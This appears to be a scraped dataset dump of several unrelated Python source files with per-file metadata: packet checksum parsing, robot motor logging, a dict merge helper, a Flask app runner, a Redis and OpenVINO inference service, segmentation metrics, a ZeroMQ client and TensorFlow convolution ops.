b = str(int(dest[2:4], 16))
c = str(int(dest[4:6], 16))
d = str(int(dest[6:8], 16))
print('Destination IP:\n', a + '.' + b + '.' + c + '.' + d)
printLine()
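    # Verify the IP header checksum: sum every 16-bit word of the header
    # except the checksum field itself (hex chars 20..24), fold the carry
    # back into the low 16 bits, then take the ones' complement (0xffff - sum).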
a = int(header[0:4], 16)
b = int(header[4:8], 16)
c = int(header[8:12], 16)
d = int(header[12:16], 16)
e = int(header[16:20], 16)
f = int(header[24:28], 16)
g = int(header[28:32], 16)
h = int(header[32:36], 16)
i = int(header[36:40], 16)
res1 = hex(a + b + c + d + e + f + g + h + i)
opnd1 = str(res1)[2:3]
opnd2 = str(res1)[3:7]
res2 = int(opnd1, 16) + int(opnd2, 16)
    mask16 = int('ffff', 16)
    res2 = mask16 - res2
    checksum2 = res2
print('Checksum by calculated:')
print('0x%04x' % checksum2)
| 24.526316
| 76
| 0.546781
| 332
| 2,330
| 3.813253
| 0.262048
| 0.063981
| 0.037915
| 0.009479
| 0.077409
| 0.077409
| 0.025276
| 0
| 0
| 0
| 0
| 0.090495
| 0.245923
| 2,330
| 94
| 77
| 24.787234
| 0.630051
| 0.001717
| 0
| 0.173333
| 0
| 0
| 0.129518
| 0.018072
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013333
| false
| 0
| 0.013333
| 0
| 0.026667
| 0.386667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb083e9034d5ab0e5ac6315a7e5ffb3f614cc66e
| 1,029
|
py
|
Python
|
tests/motors/spikebase_tank1.py
|
cschlack/pybricks-micropython
|
0abfd2918267a4e6e7a04062976ac1bb3da1f4b1
|
[
"MIT"
] | 1
|
2021-12-27T00:09:37.000Z
|
2021-12-27T00:09:37.000Z
|
tests/motors/spikebase_tank1.py
|
cschlack/pybricks-micropython
|
0abfd2918267a4e6e7a04062976ac1bb3da1f4b1
|
[
"MIT"
] | null | null | null |
tests/motors/spikebase_tank1.py
|
cschlack/pybricks-micropython
|
0abfd2918267a4e6e7a04062976ac1bb3da1f4b1
|
[
"MIT"
] | null | null | null |
from pybricks.pupdevices import Motor
from pybricks.tools import wait
from pybricks.parameters import Port, Direction
from pybricks.robotics import SpikeBase
from pybricks import version
print(version)
# Initialize base.
left_motor = Motor(Port.C)
right_motor = Motor(Port.D)
spike_base = SpikeBase(left_motor, right_motor)
# Allocate logs for motors and controller signals.
DURATION = 6000
left_motor.log.start(DURATION)
right_motor.log.start(DURATION)
spike_base.distance_control.log.start(DURATION)
spike_base.heading_control.log.start(DURATION)
# Turn in place, almost.
spike_base.tank_move_for_degrees(speed_left=250, speed_right=-247, angle=182)
# Wait so we can also log hold capability, then turn off the motor completely.
wait(100)
spike_base.stop()
# Transfer data logs.
print("Transferring data...")
left_motor.log.save("servo_left.txt")
right_motor.log.save("servo_right.txt")
spike_base.distance_control.log.save("control_distance.txt")
spike_base.heading_control.log.save("control_heading.txt")
print("Done")
| 29.4
| 78
| 0.808552
| 156
| 1,029
| 5.153846
| 0.423077
| 0.078358
| 0.079602
| 0.052239
| 0.16791
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017076
| 0.089407
| 1,029
| 34
| 79
| 30.264706
| 0.840982
| 0.179786
| 0
| 0
| 0
| 0
| 0.109785
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.217391
| 0
| 0.217391
| 0.130435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb097754f4efecf6545051b20dad8dee8adaa09e
| 1,136
|
py
|
Python
|
cyto/basic/_dict.py
|
sbtinstruments/cyto
|
f452562e5e9ae9d2516cd92958af6e6a2c985dcc
|
[
"MIT"
] | 5
|
2021-04-03T04:09:38.000Z
|
2021-12-17T15:05:18.000Z
|
cyto/basic/_dict.py
|
sbtinstruments/cyto
|
f452562e5e9ae9d2516cd92958af6e6a2c985dcc
|
[
"MIT"
] | 1
|
2021-04-21T17:00:29.000Z
|
2021-04-21T19:12:30.000Z
|
cyto/basic/_dict.py
|
sbtinstruments/cyto
|
f452562e5e9ae9d2516cd92958af6e6a2c985dcc
|
[
"MIT"
] | null | null | null |
from typing import Any, Dict
def deep_update(dest: Dict[Any, Any], other: Dict[Any, Any]) -> None:
"""Update `dest` with the key/value pairs from `other`.
Returns `None`. Note that we modify `dest` in place.
    Unlike the built-in `dict.update`, `deep_update` recurses into sub-dictionaries.
This effectively "merges" `other` into `dest`.
Note that we do not recurse into lists. We treat lists like any other
non-`dict` type and simply override the existing entry in `dest` (if any).
"""
for key, other_val in other.items():
# Simple case: `key` is not in `dest`, so we simply add it.
if key not in dest:
dest[key] = other_val
continue
# Complex case: There is a conflict, so we must "merge" `dest_val`
# and `other_val`.
dest_val = dest[key]
# Given two dicts, we can simply recurse.
if isinstance(dest_val, dict) and isinstance(other_val, dict):
deep_update(dest_val, other_val)
# Any other type combination simply overrides the existing key in `dest`
else:
dest[key] = other_val
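# Illustrative usage sketch (not part of the original module):
if __name__ == "__main__":
    base = {"a": 1, "sub": {"x": 1, "y": 2}, "lst": [1, 2]}
    other = {"sub": {"y": 20, "z": 30}, "lst": [9]}
    deep_update(base, other)
    # sub-dicts are merged recursively; lists are simply overridden
    assert base == {"a": 1, "sub": {"x": 1, "y": 20, "z": 30}, "lst": [9]}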
| 39.172414
| 84
| 0.634683
| 167
| 1,136
| 4.239521
| 0.419162
| 0.067797
| 0.04661
| 0.042373
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.269366
| 1,136
| 28
| 85
| 40.571429
| 0.853012
| 0.557218
| 0
| 0.181818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb0b0d61a04227b98b766bf05a1daba731f1fb99
| 2,312
|
py
|
Python
|
api_logic_server_cli/create_from_model/ui_basic_web_app_run.py
|
valhuber/ApiLogicServer
|
a4acd8d886a18d4d500e0fffffcaa2f1c0765040
|
[
"BSD-3-Clause"
] | 71
|
2021-01-23T17:34:33.000Z
|
2022-03-29T13:11:29.000Z
|
api_logic_server_cli/create_from_model/ui_basic_web_app_run.py
|
valhuber/ApiLogicServer
|
a4acd8d886a18d4d500e0fffffcaa2f1c0765040
|
[
"BSD-3-Clause"
] | 38
|
2021-01-24T21:56:30.000Z
|
2022-03-08T18:49:00.000Z
|
api_logic_server_cli/create_from_model/ui_basic_web_app_run.py
|
valhuber/ApiLogicServer
|
a4acd8d886a18d4d500e0fffffcaa2f1c0765040
|
[
"BSD-3-Clause"
] | 14
|
2021-01-23T16:20:44.000Z
|
2022-03-24T10:48:28.000Z
|
# runs ApiLogicServer basic web app:
# python ui/basic_web_app/run.py
# Export PYTHONPATH, to enable python ui/basic_web_app/run.py
import os, sys, logging
from pathlib import Path
logger = logging.getLogger()
current_path = Path(os.path.abspath(os.path.dirname(__file__)))
current_path = current_path.parent.absolute() # ui
current_path = current_path.parent.absolute() # project
project_dir = str(current_path)
sys.path.append(project_dir)
import ui.basic_web_app.config as config
handler = logging.StreamHandler(sys.stderr)
handler.setLevel(logging.INFO) # DEBUG, INFO, <default> WARNING, ERROR, CRITICAL
auto_log_narrow = True
if auto_log_narrow and config.SQLALCHEMY_DATABASE_URI.endswith("db.sqlite"):
formatter = logging.Formatter('%(message).120s') # lead tag - '%(name)s: %(message)s')
else:
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.propagate = True
fab_logger = logging.getLogger("flask_appbuilder")
fab_logger.setLevel(logging.WARNING)
logic_logger = logging.getLogger("logic_logger")
logic_logger.setLevel(logging.INFO)
logger.setLevel(logging.WARNING) # WARNING to reduce output, INFO for more
logger.info(f'ui/basic_web_app/run.py - project_dir: {project_dir}')
if auto_log_narrow and config.SQLALCHEMY_DATABASE_URI.endswith("db.sqlite"):
logger.warning("\nLog width reduced for readability - "
"see https://github.com/valhuber/ApiLogicServer/wiki/Tutorial#word-wrap-on-the-log\n")
# args for help
if len(sys.argv) > 1 and sys.argv[1].__contains__("help"):
print("")
print("basic_web_app - run instructions (defaults are host 0.0.0.0, port 5002):")
print(" python run.py [host [port]]")
print("")
sys.exit()
try:
logger.debug("\nui/basic_web_app/run.py - PYTHONPATH" + str(sys.path) + "\n")
# e.g., /Users/val/dev/servers/api_logic_server/ui/basic_web_app
from app import app # ui/basic_web_app/app/__init__.py activates logic
except Exception as e:
logger.error("ui/basic_web_app/run.py - Exception importing app: " + str(e))
# args to avoid port conflicts, e.g., localhost 8080
host = sys.argv[1] if sys.argv[1:] \
else "0.0.0.0"
port = sys.argv[2] if sys.argv[2:] \
else "5002"
app.run(host=host, port=port, debug=True)
| 36.125
| 105
| 0.733131
| 350
| 2,312
| 4.677143
| 0.362857
| 0.04887
| 0.067196
| 0.055589
| 0.189371
| 0.169823
| 0.103849
| 0.074527
| 0.074527
| 0.074527
| 0
| 0.014421
| 0.13019
| 2,312
| 63
| 106
| 36.698413
| 0.799602
| 0.189014
| 0
| 0.133333
| 0
| 0.022222
| 0.24275
| 0.038131
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.133333
| 0
| 0.133333
| 0.088889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb0e6ce0d08d8c7d2254af54405bab1d2071c99d
| 4,219
|
py
|
Python
|
elastic_inference/apps/infer_service.py
|
qzheng527/cloud-native-demos
|
e2dbcfc0d90c1972bc34a35f5d85f83f2b2b6cf6
|
[
"Apache-2.0"
] | 1
|
2020-04-06T10:11:27.000Z
|
2020-04-06T10:11:27.000Z
|
elastic_inference/apps/infer_service.py
|
qzheng527/cloud-native-demos
|
e2dbcfc0d90c1972bc34a35f5d85f83f2b2b6cf6
|
[
"Apache-2.0"
] | null | null | null |
elastic_inference/apps/infer_service.py
|
qzheng527/cloud-native-demos
|
e2dbcfc0d90c1972bc34a35f5d85f83f2b2b6cf6
|
[
"Apache-2.0"
] | 2
|
2021-01-19T21:42:08.000Z
|
2021-08-13T19:59:06.000Z
|
#!/usr/bin/python3
"""
Infer service.
It picks up single frames from the frame queue and runs inference. The result is
published to a stream broker as shown below.
+---------------------+ +---------------+ +-----------------------+
| Frame Queue (redis) | => | Infer Service | => | Stream broker (redis) |
+---------------------+ +---------------+ +-----------------------+
||
##
+--------------------------------+
| Infer Frame Speed (prometheus) |
+--------------------------------+
The infer service can be scaled dynamically by the Kubernetes HPA (Horizontal Pod
Autoscaler) according to metrics like "drop frame speed", "infer frame speed",
"CPU usage", etc.
"""
import os
import sys
import logging
import signal
import socket
import redis
import prometheus_client as prom
# add current path into PYTHONPATH
APP_PATH = os.path.dirname(__file__)
sys.path.append(APP_PATH)
from clcn.appbase import CLCNAppBase # pylint: disable=wrong-import-position
from clcn.frame import RedisFrameQueue # pylint: disable=wrong-import-position
from clcn.stream import RedisStreamBroker # pylint: disable=wrong-import-position
from clcn.nn.inferengine import OpenVinoInferEngineTask # pylint: disable=wrong-import-position
LOG = logging.getLogger(__name__)
class InferServiceApp(CLCNAppBase):
"""
Inference service.
"""
def init(self):
LOG.info("Host name: %s", socket.gethostname())
LOG.info("Host ip: %s", socket.gethostbyname(socket.gethostname()))
self.in_queue_host = self.get_env("INPUT_QUEUE_HOST", "127.0.0.1")
self.out_broker_host = self.get_env("OUTPUT_BROKER_HOST", "127.0.0.1")
LOG.info("Input queue host: %s", self.in_queue_host)
LOG.info("Output broker host: %s", self.out_broker_host)
self.infer_type = self.get_env("INFER_TYPE", "face")
self.model_name = self.get_env("INFER_MODEL_NAME")
        # The INFER_MODEL_PATH env var takes priority
path = self.get_env("INFER_MODEL_PATH")
if path is not None and len(path) != 0:
self.model_dir = self.get_env("INFER_MODEL_PATH")
else:
self.model_dir = self.get_env("MODEL_DIR")
LOG.info("model dir: %s", self.model_dir)
LOG.info("model name: %s", self.model_name)
self._guage_infer_fps = prom.Gauge(
'ei_infer_fps', 'Total infererence FPS')
self._guage_drop_fps = prom.Gauge(
'ei_drop_fps', 'Drop frames for infer')
self._guage_scale_ratio = prom.Gauge(
'ei_scale_ratio', 'Scale ratio for inference, (ei_infer_fps+ei_drop_fps)/ei_infer_fps')
def run(self):
in_redis_conn = redis.StrictRedis(self.in_queue_host)
out_redis_conn = in_redis_conn
if self.in_queue_host != self.out_broker_host:
out_redis_conn = redis.StrictRedis(self.out_broker_host)
input_queue = RedisFrameQueue(in_redis_conn, self.infer_type)
out_broker = RedisStreamBroker(out_redis_conn)
out_broker.start_streams_monitor_task()
infer_task = OpenVinoInferEngineTask(input_queue, out_broker,
self._report_metric,
model_dir=self.model_dir,
model_name=self.model_name)
infer_task.start()
prom.start_http_server(8000)
def _report_metric(self, infer_fps, drop_fps, scale_ratio):
self._guage_infer_fps.set(infer_fps)
self._guage_drop_fps.set(drop_fps)
self._guage_scale_ratio.set(scale_ratio)
def start_app():
"""
App entry.
"""
app = InferServiceApp()
def signal_handler(num, _):
logging.getLogger().error("signal %d", num)
app.stop()
sys.exit(1)
# setup the signal handler
signames = ['SIGINT', 'SIGHUP', 'SIGQUIT', 'SIGUSR1']
for name in signames:
signal.signal(getattr(signal, name), signal_handler)
app.run_and_wait_task()
if __name__ == "__main__":
start_app()
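# Illustrative launch sketch (not part of the original file); the env vars
# below are the ones read in InferServiceApp.init():
#   INPUT_QUEUE_HOST=redis-in OUTPUT_BROKER_HOST=redis-out \
#   INFER_TYPE=face MODEL_DIR=/models python infer_service.py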
| 35.158333
| 99
| 0.599194
| 504
| 4,219
| 4.742063
| 0.293651
| 0.020502
| 0.029289
| 0.040167
| 0.205021
| 0.084519
| 0.050209
| 0
| 0
| 0
| 0
| 0.006406
| 0.260014
| 4,219
| 119
| 100
| 35.453782
| 0.759129
| 0.254089
| 0
| 0
| 0
| 0
| 0.130239
| 0.012573
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074627
| false
| 0
| 0.164179
| 0
| 0.253731
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb0ed9b104a5cd8f1fa264f1f6318ff1bd1ed415
| 288
|
py
|
Python
|
P25010-Guangzhou-Jiachengwu/week07/ex_filecopy.py
|
xiaohh2016/python-25
|
8981ba89bfb32754c3f9c881ee8fcaf13332ce51
|
[
"Apache-2.0"
] | 1
|
2019-09-11T23:24:58.000Z
|
2019-09-11T23:24:58.000Z
|
P25010-Guangzhou-Jiachengwu/week07/ex_filecopy.py
|
xiaohh2016/python-25
|
8981ba89bfb32754c3f9c881ee8fcaf13332ce51
|
[
"Apache-2.0"
] | null | null | null |
P25010-Guangzhou-Jiachengwu/week07/ex_filecopy.py
|
xiaohh2016/python-25
|
8981ba89bfb32754c3f9c881ee8fcaf13332ce51
|
[
"Apache-2.0"
] | 5
|
2019-09-11T06:33:34.000Z
|
2020-02-17T12:52:31.000Z
|
# Use Python to copy a file from directory a to directory b
import os
from pathlib import Path
import shutil
# make sure the source and destination directories exist
Path('a').mkdir(exist_ok=True)
Path('b').mkdir(exist_ok=True)
src_path = Path('a/test')
dst_path = Path('b/test')
with open(src_path,'w') as src_file:
src_file.write('abcd\n1234')
shutil.copy(src_path,dst_path)
print(os.stat(src_path))
print(os.stat(dst_path))
| 18
| 36
| 0.756944
| 51
| 288
| 4.098039
| 0.509804
| 0.133971
| 0.105263
| 0.143541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015444
| 0.100694
| 288
| 16
| 37
| 18
| 0.791506
| 0.114583
| 0
| 0
| 0
| 0
| 0.090551
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.3
| 0
| 0.3
| 0.2
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb0fe20410b5c56d7291f72bd22a841605532524
| 548
|
py
|
Python
|
vanirio/module/interface/textfield.py
|
vaniriovanhalteren/sdk-python
|
947b08fbe046d46275bf39bc95984fbf3edc0e6c
|
[
"MIT"
] | null | null | null |
vanirio/module/interface/textfield.py
|
vaniriovanhalteren/sdk-python
|
947b08fbe046d46275bf39bc95984fbf3edc0e6c
|
[
"MIT"
] | null | null | null |
vanirio/module/interface/textfield.py
|
vaniriovanhalteren/sdk-python
|
947b08fbe046d46275bf39bc95984fbf3edc0e6c
|
[
"MIT"
] | 1
|
2022-02-08T08:15:07.000Z
|
2022-02-08T08:15:07.000Z
|
from vanirio.module.interface.base import Base
class Textfield(Base):
def __init__(self, tag: str, label: str):
"""
A Textfield interface object is used as a parameter for module
software. The interface can be used for string values.
:param label: GUI label name
:param tag: Module tag name
"""
super().__init__()
self.label = label
self.tag = tag
self._type = 'TEXTFIELD'
def encode(self) -> dict:
_base = self.encode_base()
return _base
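# Illustrative usage sketch (not part of the original module); assumes the
# Base class's encode_base() serializes tag/label/_type into a dict:
# field = Textfield(tag='username', label='User name')
# payload = field.encode()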
| 24.909091
| 70
| 0.600365
| 68
| 548
| 4.661765
| 0.514706
| 0.050473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.313869
| 548
| 21
| 71
| 26.095238
| 0.843085
| 0.319343
| 0
| 0
| 0
| 0
| 0.027778
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.1
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb1042dc49fa8be20e43a1d8892da1c69f7bf202
| 2,348
|
py
|
Python
|
utils.py
|
lanyinemt2/ST-PlusPlus
|
7c31abfcf21e390a06c4d5da1f77a9fe5ff071ed
|
[
"MIT"
] | 73
|
2021-06-10T01:12:04.000Z
|
2022-03-30T08:31:24.000Z
|
utils.py
|
lanyinemt2/ST-PlusPlus
|
7c31abfcf21e390a06c4d5da1f77a9fe5ff071ed
|
[
"MIT"
] | 12
|
2021-07-01T00:27:11.000Z
|
2022-03-17T05:09:49.000Z
|
utils.py
|
lanyinemt2/ST-PlusPlus
|
7c31abfcf21e390a06c4d5da1f77a9fe5ff071ed
|
[
"MIT"
] | 18
|
2021-06-10T11:24:31.000Z
|
2022-03-31T16:48:58.000Z
|
import numpy as np
from PIL import Image
def count_params(model):
param_num = sum(p.numel() for p in model.parameters())
return param_num / 1e6
class meanIOU:
def __init__(self, num_classes):
self.num_classes = num_classes
self.hist = np.zeros((num_classes, num_classes))
def _fast_hist(self, label_pred, label_true):
mask = (label_true >= 0) & (label_true < self.num_classes)
hist = np.bincount(
self.num_classes * label_true[mask].astype(int) +
label_pred[mask], minlength=self.num_classes ** 2).reshape(self.num_classes, self.num_classes)
return hist
def add_batch(self, predictions, gts):
for lp, lt in zip(predictions, gts):
self.hist += self._fast_hist(lp.flatten(), lt.flatten())
def evaluate(self):
iu = np.diag(self.hist) / (self.hist.sum(axis=1) + self.hist.sum(axis=0) - np.diag(self.hist))
return iu, np.nanmean(iu)
def color_map(dataset='pascal'):
cmap = np.zeros((256, 3), dtype='uint8')
if dataset == 'pascal' or dataset == 'coco':
def bitget(byteval, idx):
return (byteval & (1 << idx)) != 0
for i in range(256):
r = g = b = 0
c = i
for j in range(8):
r = r | (bitget(c, 0) << 7-j)
g = g | (bitget(c, 1) << 7-j)
b = b | (bitget(c, 2) << 7-j)
c = c >> 3
cmap[i] = np.array([r, g, b])
elif dataset == 'cityscapes':
cmap[0] = np.array([128, 64, 128])
cmap[1] = np.array([244, 35, 232])
cmap[2] = np.array([70, 70, 70])
cmap[3] = np.array([102, 102, 156])
cmap[4] = np.array([190, 153, 153])
cmap[5] = np.array([153, 153, 153])
cmap[6] = np.array([250, 170, 30])
cmap[7] = np.array([220, 220, 0])
cmap[8] = np.array([107, 142, 35])
cmap[9] = np.array([152, 251, 152])
cmap[10] = np.array([70, 130, 180])
cmap[11] = np.array([220, 20, 60])
cmap[12] = np.array([255, 0, 0])
cmap[13] = np.array([0, 0, 142])
cmap[14] = np.array([0, 0, 70])
cmap[15] = np.array([0, 60, 100])
cmap[16] = np.array([0, 80, 100])
cmap[17] = np.array([0, 0, 230])
cmap[18] = np.array([119, 11, 32])
return cmap
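# Illustrative usage sketch (not part of the original module):
# metric = meanIOU(num_classes=21)
# metric.add_batch(predictions, ground_truths)  # integer label maps, shape (N, H, W)
# per_class_iou, miou = metric.evaluate()
# palette = color_map('pascal')  # (256, 3) uint8 colormap for rendering masks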
| 33.070423
| 106
| 0.520017
| 352
| 2,348
| 3.386364
| 0.346591
| 0.11745
| 0.082215
| 0.022651
| 0.04698
| 0.04698
| 0
| 0
| 0
| 0
| 0
| 0.114724
| 0.305792
| 2,348
| 70
| 107
| 33.542857
| 0.616564
| 0
| 0
| 0
| 0
| 0
| 0.013203
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.035714
| 0.017857
| 0.267857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb107ee4532ec8cc33a8bdd76e5d3973b9f4d818
| 3,671
|
py
|
Python
|
lib/bus/client.py
|
hoffmannmatheus/eaZy
|
d79ade0e01a23f1c6fa585ee378ed70c95976b05
|
[
"MIT",
"Unlicense"
] | 3
|
2015-01-11T15:29:48.000Z
|
2020-09-08T14:52:14.000Z
|
lib/bus/client.py
|
hoffmannmatheus/eaZy
|
d79ade0e01a23f1c6fa585ee378ed70c95976b05
|
[
"MIT",
"Unlicense"
] | null | null | null |
lib/bus/client.py
|
hoffmannmatheus/eaZy
|
d79ade0e01a23f1c6fa585ee378ed70c95976b05
|
[
"MIT",
"Unlicense"
] | null | null | null |
import zmq
import json
"""
Class used by the Client entity to communicate to the Server.
The communication channel should be configured using the three ports:
- com_port: Used to receive broadcast messages from the Server entity.
- set_port: Used to send messages/request data to the Server entity.
 - res_port: Used to receive a response from a Server.
"""
defaults = {
'host' : '127.0.0.1',
'com_port' : 5556,
'set_port' : 5557,
'res_port' : 5558
}
context = zmq.Context()
class BusClient:
def __init__(self, id, filter, opt=defaults):
"""
Constructs a new Bus Client instance.
@param id The identification of this Client.
@param filter The filter (Server id) of messages.
        @param opt An object that contains the configuration for this Bus
        Client. If not provided, the default configuration is used. eg:
        {host="localhost", com_port=1, set_port=2, res_port=3}
"""
self.id = id
self.filter = filter
self.host = opt['host']
self.com_port = opt['com_port']
self.set_port = opt['set_port']
self.res_port = opt['res_port']
def setup(self):
"""
Prepares this Bus Server to be used. Before sending/receiving messages,
the method setup() should be called to properly setup the socket
configurations.
"""
self.context = zmq.Context()
self.sub_socket = self.context.socket(zmq.SUB)
if self.filter:
self.sub_socket.setsockopt(zmq.SUBSCRIBE, self.filter)
self.sub_socket.connect('tcp://'+self.host+':'+str(self.com_port))
return self
def check_income(self, blocking=None):
"""
        Receives a message from the communication channel's Server. Tries to
        get a message from the communication channel, checking the 'com_port'
        for broadcast messages from the Server.
        @param blocking If false, the method checks whether a message is
        available and returns it, or False if no message was received. If
        true, the method is meant to block until a new message arrives
        (note: the current implementation always polls without blocking).
"""
raw_data = ''
try:
raw_data = self.sub_socket.recv(zmq.NOBLOCK)
except zmq.error.Again:
return False
sender, msg = raw_data.split(' ', 1)
return json.loads(msg), sender
def send(self, data, type='send'):
"""
        Send a message to the Server. Sends the given message to the Server of
        this communication channel, using the 'set_port'.
        @param data An object or string containing the message.
"""
msg = {'type':type, 'data':data, 'sender':self.id}
set_socket = self.context.socket(zmq.PAIR)
set_socket.connect('tcp://'+self.host+':'+str(self.set_port))
set_socket.send(json.dumps(msg))
set_socket.close()
return self
def get(self, request):
"""
Make a request for the Server. When called, a message is sent to the
Server indicating this Client has made a request. The Client will stay
blocked until the response from the Server is received on the
'res_port', and then returned.
@param request A string indicating the request (eg. 'device_list')
"""
self.send(request, 'get')
res_socket = self.context.socket(zmq.PAIR)
res_socket.bind('tcp://'+self.host+':'+str(self.res_port))
response = res_socket.recv()
res_socket.close()
return json.loads(response)['data']
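# Illustrative usage sketch (not part of the original module); assumes a
# matching Bus Server is already listening on the default ports:
# client = BusClient(id='client-1', filter=b'server-1').setup()
# client.send({'state': 'on'})         # fire-and-forget, uses set_port
# devices = client.get('device_list')  # blocking request/response via res_port
# incoming = client.check_income()     # False when nothing is queued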
| 35.990196
| 79
| 0.625443
| 496
| 3,671
| 4.544355
| 0.300403
| 0.035936
| 0.024401
| 0.030612
| 0.149068
| 0.085182
| 0.027507
| 0
| 0
| 0
| 0
| 0.008305
| 0.278398
| 3,671
| 101
| 80
| 36.346535
| 0.842582
| 0.376192
| 0
| 0.043478
| 0
| 0
| 0.067066
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0.043478
| 0
| 0.282609
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fb12ef0139d2387d5de8cd18fde96987527d5c7f
| 2,821
|
py
|
Python
|
ops.py
|
fivoskal/MGAN
|
2eb1407c907af5f472a80e8ae363bee57d5cfaa4
|
[
"MIT"
] | 37
|
2018-03-07T15:32:09.000Z
|
2022-03-01T06:54:06.000Z
|
ops.py
|
fivoskal/MGAN
|
2eb1407c907af5f472a80e8ae363bee57d5cfaa4
|
[
"MIT"
] | 2
|
2018-09-19T23:20:07.000Z
|
2019-06-15T13:45:54.000Z
|
ops.py
|
fivoskal/MGAN
|
2eb1407c907af5f472a80e8ae363bee57d5cfaa4
|
[
"MIT"
] | 18
|
2018-05-23T11:09:34.000Z
|
2022-03-22T08:38:13.000Z
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import numpy as np
import tensorflow as tf
def lrelu(x, alpha=0.2):
return tf.maximum(x, alpha * x)
def linear(input, output_dim, scope='linear', stddev=0.01):
norm = tf.random_normal_initializer(stddev=stddev)
const = tf.constant_initializer(0.0)
with tf.variable_scope(scope):
w = tf.get_variable('weights', [input.get_shape()[1], output_dim], initializer=norm)
b = tf.get_variable('biases', [output_dim], initializer=const)
return tf.matmul(input, w) + b
def conv2d(input_, output_dim,
k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,
name="conv2d"):
with tf.variable_scope(name):
w = tf.get_variable('weights', [k_h, k_w, input_.get_shape()[-1], output_dim],
initializer=tf.truncated_normal_initializer(stddev=stddev))
conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')
biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))
# conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())
return tf.nn.bias_add(conv, biases)
def deconv2d(input_, output_shape,
k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,
name="deconv2d", with_w=False):
with tf.variable_scope(name):
# filter : [height, width, output_channels, in_channels]
w = tf.get_variable('weights', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],
initializer=tf.random_normal_initializer(stddev=stddev))
try:
deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,
strides=[1, d_h, d_w, 1])
# Support for versions of TensorFlow before 0.7.0
except AttributeError:
deconv = tf.nn.deconv2d(input_, w, output_shape=output_shape,
strides=[1, d_h, d_w, 1])
biases = tf.get_variable('biases', [output_shape[-1]],
initializer=tf.constant_initializer(0.0))
deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())
if with_w:
return deconv, w, biases
else:
return deconv
def gmm_sample(num_samples, mix_coeffs, mean, cov):
